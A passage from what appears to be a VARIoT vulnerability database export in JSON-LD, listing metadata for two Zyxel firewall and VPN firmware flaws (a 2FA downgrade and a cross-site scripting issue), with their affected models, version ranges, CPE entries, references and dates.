        "data": "A downgrade from two-factor authentication to one-factor authentication vulnerability in the CGI program of Zyxel USG/ZyWALL series firmware versions 4.32 through 4.71, USG FLEX series firmware versions 4.50 through 5.21, ATP series firmware versions 4.32 through 5.21, and VPN series firmware versions 4.32 through 5.21, that could allow an authenticated attacker to bypass the second authentication phase to connect the IPsec VPN server even though the two-factor authentication (2FA) was enabled.",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2022-0910"
          }
        ],
        "trust": 1.0
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2022-0910",
            "trust": 1.6
          },
          {
            "db": "CS-HELP",
            "id": "SB2022052406",
            "trust": 0.6
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202205-3996",
            "trust": 0.6
          }
        ],
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2022-0910"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202205-3996"
          }
        ]
      },
      "id": "VAR-202205-1787",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "VARIoT devices database",
            "id": null
          }
        ],
        "trust": 0.35069445
      },
      "last_update_date": "2023-12-18T13:22:23.047000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "Zyxel USG/ZyWALL Remediation measures for authorization problem vulnerabilities",
            "trust": 0.6,
            "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=195229"
          }
        ],
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202205-3996"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-287",
            "trust": 1.0
          }
        ],
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2022-0910"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 1.6,
            "url": "https://www.zyxel.com/support/multiple-vulnerabilities-of-firewalls-ap-controllers-and-aps.shtml"
          },
          {
            "trust": 0.6,
            "url": "https://www.cybersecurity-help.cz/vdb/sb2022052406"
          },
          {
            "trust": 0.6,
            "url": "https://cxsecurity.com/cveshow/cve-2022-0910/"
          }
        ],
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2022-0910"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202205-3996"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2022-0910"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202205-3996"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2022-05-24T03:15:09.150000",
            "db": "NVD",
            "id": "CVE-2022-0910"
          },
          {
            "date": "2022-05-24T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202205-3996"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2022-06-06T18:17:43.570000",
            "db": "NVD",
            "id": "CVE-2022-0910"
          },
          {
            "date": "2022-06-08T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202205-3996"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202205-3996"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Zyxel USG/ZyWALL Authorization problem vulnerability",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202205-3996"
          }
        ],
        "trust": 0.6
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "authorization issue",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202205-3996"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-202205-1788

    Vulnerability from variot - Updated: 2023-12-18 13:22

    A cross-site scripting vulnerability was identified in the CGI program of Zyxel USG/ZyWALL series firmware versions 4.35 through 4.70, USG FLEX series firmware versions 4.50 through 5.20, ATP series firmware versions 4.35 through 5.20, and VPN series firmware versions 4.35 through 5.20, that could allow an attacker to obtain some information stored in the user's browser, such as cookies or session tokens, via a malicious script

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-202205-1788",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "atp200",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.35"
          },
          {
            "model": "usg 60",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.70"
          },
          {
            "model": "vpn300",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.20"
          },
          {
            "model": "atp100w",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.20"
          },
          {
            "model": "usg210",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.35"
          },
          {
            "model": "usg 310",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.35"
          },
          {
            "model": "vpn100",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.35"
          },
          {
            "model": "usg200",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.35"
          },
          {
            "model": "vpn1000",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.35"
          },
          {
            "model": "vpn50",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.35"
          },
          {
            "model": "atp800",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.35"
          },
          {
            "model": "usg 20w",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.70"
          },
          {
            "model": "vpn100",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.20"
          },
          {
            "model": "atp200",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.20"
          },
          {
            "model": "usg20",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.70"
          },
          {
            "model": "usg 20w-vpn",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.70"
          },
          {
            "model": "vpn1000",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.20"
          },
          {
            "model": "usg2200",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.35"
          },
          {
            "model": "usg 2200-vpn",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.70"
          },
          {
            "model": "usg310",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.35"
          },
          {
            "model": "usg flex 100",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.20"
          },
          {
            "model": "usg flex 500",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.50"
          },
          {
            "model": "usg flex 700",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.20"
          },
          {
            "model": "usg300",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.35"
          },
          {
            "model": "usg 40",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.70"
          },
          {
            "model": "usg 60",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.35"
          },
          {
            "model": "usg 60w",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.70"
          },
          {
            "model": "usg 40w",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.70"
          },
          {
            "model": "usg 1900",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.70"
          },
          {
            "model": "vpn50",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.20"
          },
          {
            "model": "usg 110",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.35"
          },
          {
            "model": "atp700",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.35"
          },
          {
            "model": "atp500",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.35"
          },
          {
            "model": "usg flex 200",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.20"
          },
          {
            "model": "usg flex 100w",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.20"
          },
          {
            "model": "atp800",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.20"
          },
          {
            "model": "usg 1100",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.70"
          },
          {
            "model": "usg 20w",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.35"
          },
          {
            "model": "usg 310",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.70"
          },
          {
            "model": "usg20",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.35"
          },
          {
            "model": "usg210",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.70"
          },
          {
            "model": "usg310",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.70"
          },
          {
            "model": "usg flex 100",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.50"
          },
          {
            "model": "atp100",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.35"
          },
          {
            "model": "usg 1900",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.35"
          },
          {
            "model": "atp700",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.20"
          },
          {
            "model": "usg200",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.70"
          },
          {
            "model": "atp100w",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.35"
          },
          {
            "model": "usg2200",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.70"
          },
          {
            "model": "usg300",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.70"
          },
          {
            "model": "usg 20w-vpn",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.35"
          },
          {
            "model": "atp100",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.20"
          },
          {
            "model": "usg 2200-vpn",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.35"
          },
          {
            "model": "atp500",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.20"
          },
          {
            "model": "usg 40",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.35"
          },
          {
            "model": "usg 1100",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.35"
          },
          {
            "model": "usg 40w",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.35"
          },
          {
            "model": "usg 60w",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.35"
          },
          {
            "model": "usg flex 700",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.50"
          },
          {
            "model": "vpn300",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.35"
          },
          {
            "model": "usg flex 200",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.50"
          },
          {
            "model": "usg 110",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.70"
          },
          {
            "model": "usg flex 500",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.20"
          },
          {
            "model": "usg flex 100w",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.50"
          }
        ],
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2022-0734"
          }
        ]
      },
      "configurations": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/configurations#",
          "children": {
            "@container": "@list"
          },
          "cpe_match": {
            "@container": "@list"
          },
          "data": {
            "@container": "@list"
          },
          "nodes": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:vpn100_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "5.20",
                        "versionStartIncluding": "4.35",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:vpn100:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:vpn1000_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "5.20",
                        "versionStartIncluding": "4.35",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:vpn1000:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:vpn300_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "5.20",
                        "versionStartIncluding": "4.35",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:vpn300:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:vpn50_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "5.20",
                        "versionStartIncluding": "4.35",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:vpn50:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:atp100_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "5.20",
                        "versionStartIncluding": "4.35",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:atp100:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:atp100w_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "5.20",
                        "versionStartIncluding": "4.35",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:atp100w:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:atp200_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "5.20",
                        "versionStartIncluding": "4.35",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:atp200:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:atp500_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "5.20",
                        "versionStartIncluding": "4.35",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:atp500:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:atp700_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "5.20",
                        "versionStartIncluding": "4.35",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:atp700:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:atp800_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "5.20",
                        "versionStartIncluding": "4.35",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:atp800:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_110_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "4.70",
                        "versionStartIncluding": "4.35",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg_110:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_1100_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "4.70",
                        "versionStartIncluding": "4.35",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg_1100:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_1900_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "4.70",
                        "versionStartIncluding": "4.35",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg_1900:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_20w_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "4.70",
                        "versionStartIncluding": "4.35",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg_20w:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_20w-vpn_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "4.70",
                        "versionStartIncluding": "4.35",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg_20w-vpn:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_2200-vpn_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "4.70",
                        "versionStartIncluding": "4.35",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg_2200-vpn:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_310_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "4.70",
                        "versionStartIncluding": "4.35",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg_310:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_40_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "4.70",
                        "versionStartIncluding": "4.35",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg_40:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_40w_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "4.70",
                        "versionStartIncluding": "4.35",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg_40w:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_60_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "4.70",
                        "versionStartIncluding": "4.35",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg_60:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_60w_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "4.70",
                        "versionStartIncluding": "4.35",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg_60w:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_flex_100_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "5.20",
